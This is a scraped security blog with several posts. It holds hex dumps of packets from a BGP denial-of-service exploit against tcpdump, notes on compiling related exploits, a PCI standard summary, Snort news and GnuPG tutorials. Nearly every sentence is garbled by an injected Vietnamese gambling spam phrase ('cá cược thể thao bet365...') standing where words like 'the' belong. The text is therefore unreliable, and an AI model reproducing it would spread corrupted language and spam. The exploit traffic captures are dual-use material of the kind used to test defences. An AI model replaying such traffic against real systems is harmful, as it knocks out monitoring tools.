=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.884950 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37800 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x7ADA03B4  Ack: 0xA425913E  Win: 0x8218  TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837751 207951117 
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00  ...?O..0HA.V..E.
0x0010: 00 57 93 A8 40 00 40 06 23 A2 C0 A8 01 05 C0 A8  .W..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 18  ......z....%.>..
0x0030: 82 18 DC FF 00 00 01 01 08 0A 08 B1 4E B7 0C 65  ............N..e
0x0040: 15 0D FF FF FF FF FF FF FF FF FF FF FF FF FF FF  ................
0x0050: FF FF 00 13 02 00 01 00 FF 00 FF 0E 00 FF 00 01  ................
0x0060: 84 00 00 00 00                                   .....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.984345 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30793 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E  Ack: 0x7ADA03D7  Win: 0x8218  TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951178 145837751 
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00  .0HA.V...?O...E.
0x0010: 00 34 78 49 40 00 40 06 3F 24 C0 A8 01 01 C0 A8  .4xI@.@.?$......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D7 80 10  .......%.>z.....
0x0030: 82 18 62 EE 00 00 01 01 08 0A 0C 65 15 4A 08 B1  ..b........e.J..
0x0040: 4E B7                                            N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396501 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38045 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x7ADA03D7  Ack: 0xA425913E  Win: 0x8218  TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951178 
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00  ...?O..0HA.V..E.
0x0010: 00 34 94 9D 40 00 40 06 22 D0 C0 A8 01 05 C0 A8  .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D7 A4 25 91 3E 80 11  ......z....%.>..
0x0030: 82 18 62 BA 00 00 01 01 08 0A 08 B1 4E EA 0C 65  ..b.........N..e
0x0040: 15 4A                                            .J

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396841 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31075 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E  Ack: 0x7ADA03D8  Win: 0x8218  TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802 
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00  .0HA.V...?O...E.
0x0010: 00 34 79 63 40 00 40 06 3E 0A C0 A8 01 01 C0 A8  .4yc@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 10  .......%.>z.....
0x0030: 82 18 62 91 00 00 01 01 08 0A 0C 65 15 73 08 B1  ..b........e.s..
0x0040: 4E EA                                            N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396856 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31076 IpLen:20 DgmLen:52 DF
***A***F Seq: 0xA425913E  Ack: 0x7ADA03D8  Win: 0x8218  TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802 
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00  .0HA.V...?O...E.
0x0010: 00 34 79 64 40 00 40 06 3E 09 C0 A8 01 01 C0 A8  .4yd@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 11  .......%.>z.....
0x0030: 82 18 62 90 00 00 01 01 08 0A 0C 65 15 73 08 B1  ..b........e.s..
0x0040: 4E EA                                            N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396922 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38046 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03D8  Ack: 0xA425913F  Win: 0x8217  TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951219 
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00  ...?O..0HA.V..E.
0x0010: 00 34 94 9E 40 00 40 06 22 CF C0 A8 01 05 C0 A8  .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D8 A4 25 91 3F 80 10  ......z....%.?..
0x0030: 82 17 62 91 00 00 01 01 08 0A 08 B1 4E EA 0C 65  ..b.........N..e
0x0040: 15 73                                            .s

Here is sample traffic for you to try: bgp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 -r option without killing Tcpdump.

Vade79 also released exploits titled xtcpdump-isis-dos.c and xtcpdump+ethr-rsvp-dos.c, for Intermediate System to Intermediate System (IS-IS) and Resource ReSerVation setup Protocol (RSVP), respectively.

While I could get all four exploits to compile on FreeBSD, I could not get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se last two to generate traffic. I believe cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem lies with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 spoofing mechanism in each exploit. I was only able to get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first two exploits to work when I enabled cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "nospoof" options.

Keep an eye on Tcpdump.org and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tcpdump-workers mailing list for developments. The latest tcpdump-current.tar.gz or CVS check-outs should be patched. I also expect to see a Tcpdump 3.9.0 official release patched against cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se problems next week.

Payment Card Industry Security Guidelines

I heard about this back in December, but it slipped off my radar. Now news outlets like The Register and News.com are reporting on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Payment Card Industry (PCI) Data Security Standard. Prior to standardization on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 PCI, vendors had to juggle cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Visa Cardholder Information Security Program (CISP), cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 MasterCard Site Data Protection Program, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 American Express Data Security Operating Policy (DSOP), and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Discover Information Security and Compliance (DISC) document.

The PCI was publicized back in December when Visa released a memo (available in .pdf form here) letting vendors know what was happening.

The PCI standard consists of twelve requirements:

Build and Maintain a Secure Network
1. Install and maintain a firewall configuration to protect data
2. Do not use vendor-supplied defaults for system passwords and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r security parameters

Protect Cardholder Data
3. Protect stored data
4. Encrypt transmission of cardholder data and sensitive information across public networks

Maintain a Vulnerability Management Program
5. Use and regularly update anti-virus software
6. Develop and maintain secure systems and applications

Implement Strong Access Control Measures
7. Restrict access to data by business need-to-know
8. Assign a unique ID to each person with computer access
9. Restrict physical access to cardholder data

Regularly Monitor and Test Networks
10. Track and monitor all access to network resources and cardholder data
11. Regularly test security systems and processes
Maintain an Information Security Policy
12. Maintain a policy that addresses information security

Visa's Cardholder Information Security Program page has cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most browsable online content, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Mastercard page has information as well.

Merchant e-Solutions summarizes PCI, with a note than level 2 (150,000 to 6,000,000 transactions per year) and 3 (20,000 to 150,000 transactions per year) merchants require validation by a "Qualified Independent Scan Vendor" no later than June 30, 2005. Some documents also mention a "Qualified Independent Security Assessor." I've emailed Visa to find out how a vendor becomes "qualified," although one of my friends is already taking his security company through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 process.

I think helping merchants meet cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se standards will usher a new wave of assessment business for security vendors. On a smaller scale, requirements to "Regularly Monitor and Test Networks" include intrusion detection and traffic audit components, so I look forward to participating in this process myself.

I noticed Foundstone offers a series of Webcasts on PCI and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r standards. Regarding ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r standards, Application Security Inc. helpfully summarizes several of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m in one place.

Update: I just got this email from Visa:

Thank you for your interest in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Visa CISP program. Visa is unable to qualify additional security assessors at this time. We are, however, currently considering opening cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 qualification program again to accept new security assessors. We will keep your information on file and respond if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 program opens again. We will also make this information available on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 website, so be sure to check back periodically.

Your company may certainly assist companies in meeting and maintaining compliance with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CISP requirements. Unfortunately, Visa is unable to review compliance solutions at this time.

MasterCard owns cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 scan vendor qualification program. You will need to contact MasterCard to apply for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 program. https://sdp.mastercardintl.com/

Regards,
The CISP Team
http://www.visa.com/cisp

Update 2: Here is Visa's list of Qualified Independent Security Assessors in .pdf format. Here is Mastercard's list of Qualified Independent Scan Vendors. Mastercard explains cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir vendor certification process on that page, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y have not yet responded to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 email I sent yesterday. Mastercard does provide a Web-based form to let candidate vendors begin cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 certification process.

Update 3: I got an email from Mastercard pointing me to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 resources I outlined earlier. The sender said Mastercard charges $5,000 to become a Qualified Independent Scan Vendor. How can cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y possibly justify this cost? Unlike Visa, however, Mastercard is currently accepting new applicants to become Qualified Independent Scan Vendors.

Snort Developments

I have a few news items from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Snort world. First, Snort 2.3.3 was released. This should not have any news rules, as it's not Snort 2.4.0 or Snort 3.0.0. Snort 2.3.3 does feature a so-called "mini-preprocessor" to watch for attacks exploiting Vulnerability in Exchange Server Allows Remote Code Execution (MS05-021). Code to allegedly test for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability is here, so you might want to try testing Snort 2.3.3 with it.

Second, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Open Source Snort Rules Consortium ossrc-intro mailing list is operational. Currently cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lead thread is asking for comments on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest OSSRC Charter, dated 22 March 2005. This is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same document I previously examined.

Sending Encrypted Email

In previous blog entries I've created GnuPG keys and decrypted a message encrypted with my public GnuPG key. In this entry I show how I respond with an encrypted email using Enigmail and how I encrypt a file using gpg at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 command line.

You'll remember Bob sent me an encrypted email. I decided to send Bob an encrypted email in return. The first task was to find his public key. I used cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key search feature. You may remember Bob included pgp.mit.edu in his signature as a hint for where to look for his public key, so I pass that site as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 keyserver.

orr:/home/richard$ gpg --keyserver pgp.mit.edu
 --search-keys rgrabowsky_at_rasecurity_dot_com
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: searching for "rgrabowsky_at_rasecurity_dot_com" from hkp server pgp.mit.edu
(1)     Bob Grabowsky bob_at_infotech-nj_dot_com
        Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
        Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
        Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com
          1024 bit DSA key 7932C9E3, created: 2001-05-27
Enter number(s), N)ext, or Q)uit > 1
gpg: requesting key 7932C9E3 from hkp server pgp.mit.edu
gpg: key 7932C9E3: public key "Robert Grabowsky " imported
gpg: Total number processed: 1
gpg:               imported: 1

That was easy. Because I found cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key and selected it, GnuPG imported it automatically. I can verify that.

orr:/home/richard$ gpg --list-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub   1024D/752B57C7 2005-04-23
uid                  Richard Bejtlich richard_at_taosecurity_dot_com
sub   2048g/8BA44991 2005-04-23

pub   1024D/7932C9E3 2001-05-27
uid                  Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
uid                  Bob Grabowsky bob_at_infotech-nj_dot_com
uid                  Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
uid                  Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com
sub   1024g/8F0D6977 2001-05-27

Anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r alternative is to check a Web-based keyserver search form. I visited www.pgp.net/pgpnet/wwwkeys.html and searched on Bob's last name. Here are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pertinent results, with email addresses altered slightly to spoil harvesters.

pub  1024D/7932C9E3 2001-05-27 Bob Grabowsky bob_at_infotech-nj_dot_com
                               Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
                               Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
                               Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com

Notice cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key ID of 7932C9E3. This is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same value that appeared in Bob's signature in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 message he sent to me. This must be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 right public key. I've already imported cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key with GnuPG, but if I wanted to use cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key stored on this Web-based keyserver, I would download cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key linked to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se results. I would cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n use cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 import command.

So how did I respond to Bob's email? Enigmail made it easy. I decided to reply, and Enigmail asked if I wanted to configure Enigmail to import Bob's public key. In a second window I confirmed that I wanted Enigmail to use Bob's email address to locate his public key. When I selected 'send', I briefly saw my message in ASCII-armored format like this.

-----BEGIN PGP MESSAGE-----
Charset: ISO-8859-1
Version: GnuPG v1.4.0 (FreeBSD)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

hQEOAzf/9vKPDWl3EAQAqmMHJKxFtj1oN2NV0wUGvNmYTXvazSSiWg3iPzNix+n0
i5qajeTQ+v6PSlY5SvMwDaW6Ojp6MtsQ90O5IrrE1TBfSeDpO6EbQ2Vd0xhdGNtT
...truncated...

Then it was on its way, and it appeared in clear text in my Thunderbird window. Because I also asked Engimail to sign cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 message for me, I saw a signature and key icons in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Thunderbird window indicating gpg had signed and encrypted my reply.

Earlier I mentioned importing a key from a file. As an example I import Bamm Visscher's public key, retrieved from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Web-accessible keyserver.

orr:/home/richard$ gpg --import bamm.asc 
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: key 593C82C4: public key "Bamm Visscher (Senior
     Engineer/Managed Security Services) rvisscher_at_saball_dot_com" imported
gpg: Total number processed: 1
gpg:               imported: 1

Let's say I wanted to send an encrypted file to Bamm. The file is secret.txt. Here's how I would encrypt it. First I verify his user ID.

orr:/home/richard$ gpg --list-keys Bamm Visscher
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
pub   1024D/593C82C4 2001-06-26
uid                  Bamm Visscher (Senior Engineer/Managed Security Services)
                     rvisscher_at_saball_dot_com
sub   1024g/A3D3321B 2001-06-26

His UID is "Bamm Visscher". Now I encrypt secret.txt.

orr:/home/richard$ gpg -sear "Bamm Visscher" secret.txt 
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

gpg: A3D3321B: There is no assurance this key belongs to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 named user

pub  1024g/A3D3321B 2001-06-26 Bamm Visscher
     (Senior Engineer/Managed Security Services) rvisscher_at_saball_dot_com
 Primary key fingerprint: 7FA4 8692 4707 D567 E0D7  5835 416C 0915 593C 82C4
      Subkey fingerprint: 4282 C306 F28B C630 8057  50EC E3E1 FEE5 A3D3 321B

It is NOT certain that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key belongs to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 person named
in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user ID.  If you *really* know what you are doing,
you may answer cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next question with yes.

Use this key anyway? (y/N) y

The 's' switch signs cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 file. The 'e' switch specifies encryption. The 'a' switch tells gpg to create an ASCII-armored file suitable for transport via email text. The 'r' switch says a UID follows, e.g. "Bamm Visscher".

You'll notice gpg complained that it couldn't be sure Bamm's public key belonged to him. This is where cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key fingerprint and a call to Bamm come into play. If I wanted to verify cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 aucá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365nticity of Bamm's public key, I would call him and ask him to tell me his fingerprint. Since it matches cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 value posted above, I know he is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 owner of this public key. When I trust his key, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n I can sign it with my own as follows.

orr:/home/richard$ gpg --sign-key A3D3321B
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

pub  1024D/593C82C4  created: 2001-06-26  expires: never       usage: CSA 
                     trust: unknown       validity: unknown
sub  1024g/A3D3321B  created: 2001-06-26  expires: never       usage: E   
[ unknown] (1). Bamm Visscher (Senior Engineer/Managed Security Services) 


pub  1024D/593C82C4  created: 2001-06-26  expires: never       usage: CSA 
                     trust: unknown       validity: unknown
 Primary key fingerprint: 7FA4 8692 4707 D567 E0D7  5835 416C 0915 593C 82C4

     Bamm Visscher (Senior Engineer/Managed Security Services)
     rvisscher_at_saball_dot_com

Are you sure that you want to sign this key with your
key "Richard Bejtlich richard_at_taosecurity_dot_com" (752B57C7)

Really sign? (y/N) y

You need a passphrase to unlock cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

Let's say I now want to send Bamm secret2.txt in encrypted form. Does gpg complain after I've signed Bamm's public key?

orr:/home/richard$ gpg -sear "Bamm Visscher" secret2.txt 
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

gpg: checking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0  valid:   1  signed:   1  trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1  valid:   1  signed:   0  trust: 1-, 0q, 0n, 0m, 0f, 0u

No problems. If I wanted to upload this signed key to a keyserver, I could use this syntax.

gpg --keyserver [keyserver] --send-key [Key_ID]

I wrote cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se three blog entries to document how I got GnuPG running and working with Thunderbird. There are many GnuPG tutorials and documents online, and I recommend referencing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m for more information. Thanks to Bob for sending a test message.

Decrypting Encrypted Email

No sooner had I posted my last entry on creating a GnuPG key, a visitor sent me an encrypted email. My mail client is Thunderbird, and it promptly put a message from Robert Grabowsky into my Junk folder. Thunderbird suspected cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 message was spam! It looked like this. Certain fields have been edited to foil email address harvesting:

Date: Sat, 23 Apr 2005 17:26:37 -0400 (EDT)
From: Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
To: Richard Bejtlich richard_at_taosecurit_dot_com
Subject: test of your key

-----BEGIN PGP MESSAGE-----

hQIOA+vNZOSLpEmREAf/XTL0KqQAnwOIkONZGgZMsyEFD00O7O8qzNRmv7A/IVwg
o95VmxSoUXDIwNtQG1QpSbTY217k/HmUEKup0n2laON49SGKj1H76SwS0BVNG8Xj
...edited...
ADc/eiJOmnZuhDhTYMJoqziAilKf9Y7ChHKKjtil2WTrnNL3qfwX5636Sb3sjFMg
f1Q+WCHWMr9LOQG3JGmGfjNZe6iMzp+Wl5y7m/j+7HMwiVp+J2sHyx1pffnGtFgP
=Xa7M
-----END PGP MESSAGE-----

To manually decrypt this message, I saved cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 message body into a file called msg.txt. Then I used gpg to decrypt it.

orr:/home/richard$ gpg -d msg.txt 
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
2048-bit ELG-E key, ID 8BA44991, created 2005-04-23 (main key ID 752B57C7)

gpg: encrypted with 2048-bit ELG-E key, ID 8BA44991, created 2005-04-23
      "Richard Bejtlich richard_at_taosecurity_dot_com"
Hi Richard,

Here's a quick test of your GnuPG key.  Keep of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 great work on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365
blog, I check it every day!!!

Best Regards,
Bob

Robert Grabowsky, CISSP | Ra Security Systems, Inc.
rgrabowsky_at_rasecurity_dot_com  | GPG KeyID 0x7932C9E3 (pgp.mit.edu)

An excellent alternative to manual decryption is Enigmail, a plug-in for Thunderbird and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Mozilla client. I installed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mail/enigmail-thunderbird FreeBSD package and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n fired up Thunderbird. I had a new menu item called "Enigmail". When I highlighted Bob's message, Enigmail began a simple setup procedure.

It asked me to enter my private GnuPG passphrase, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n it wanted to know where cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 gpg binary resided. I entered /usr/local/bin/gpg. With that, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 message was decrypted automatically. Now when I see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 message within Thunderbird, it appears as clear text.

Now I needed to send a reply. I will enter that in a future blog posting shortly.

Simple GnuPG Key Creation

I was recently asked to provide my GnuPG public key to facilitate sharing encrypted documents. I realized I needed to set up a public key with my richard at taosecurity dot com mailing address. Here's how I did it. First I installed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 FreeBSD security/gnupg-devel package. Then I was ready to begin. I started by creating my key. Where necessary I've modified my email address in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 listing below to spoil simple harvesting methods.

orr:/home/richard$ gpg --gen-key
gpg (GnuPG) 1.4.0; Copyright (C) 2004 Free Software Foundation, Inc.
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 file COPYING for details.

gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: directory `/home/richard/.gnupg' created
gpg: new configuration file `/home/richard/.gnupg/gpg.conf' created
gpg: WARNING: options in `/home/richard/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/home/richard/.gnupg/secring.gpg' created
gpg: keyring `/home/richard/.gnupg/pubring.gpg' created
Please select what kind of key you want:
   (1) DSA and Elgamal (default)
   (2) DSA (sign only)
   (5) RSA (sign only)
Your selection? 1
DSA keypair will have 1024 bits.
ELG-E keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 
Requested keysize is 2048 bits
Please specify how long cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key should be valid.
         0 = key does not expire
        = key expires in n days
      w = key expires in n weeks
      m = key expires in n months
      y = key expires in n years
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N) y

You need a user ID to identify your key; cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 software constructs cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user ID
from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Real Name, Comment and Email Address in this form:
    "Heinrich Heine (Der Dichter) heinrichh@duesseldorf.de"

Real name: Richard Bejtlich
Email address: richard_at_taosecurity_dot_com
Comment: 
You selected this USER-ID:
    "Richard Bejtlich richard_at_taosecurity_dot_com"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o
You need a Passphrase to protect your secret key.

Enter passphrase: 
                  
Repeat passphrase: 
                   
We need to generate a lot of random bytes. It is a good idea to perform
some ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r action (type on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 keyboard, move cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mouse, utilize cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365
disks) during cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 prime generation; this gives cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 random number
generator a better chance to gain enough entropy.
++++++++++.
gpg: /home/richard/.gnupg/trustdb.gpg: trustdb created
gpg: key 752B57C7 marked as ultimately trusted
public and secret key created and signed.

gpg: checking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0  valid:   1  signed:   0  trust: 0-, 0q, 0n, 0m, 0f, 1u
pub   1024D/752B57C7 2005-04-23
      Key fingerprint = 2B43 9A2E 6925 D581 5E34  FD6B 020C E655 752B 57C7
uid                  Richard Bejtlich richard_at_taosecurity_dot_com
sub   2048g/8BA44991 2005-04-23

That's it. I cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n listed my keys.

orr:/home/richard$ gpg --list-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub   1024D/752B57C7 2005-04-23
uid                  Richard Bejtlich richard_at_taosecurity_dot_com
sub   2048g/8BA44991 2005-04-23

orr:/home/richard$ gpg --list-secret-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/secring.gpg
--------------------------------
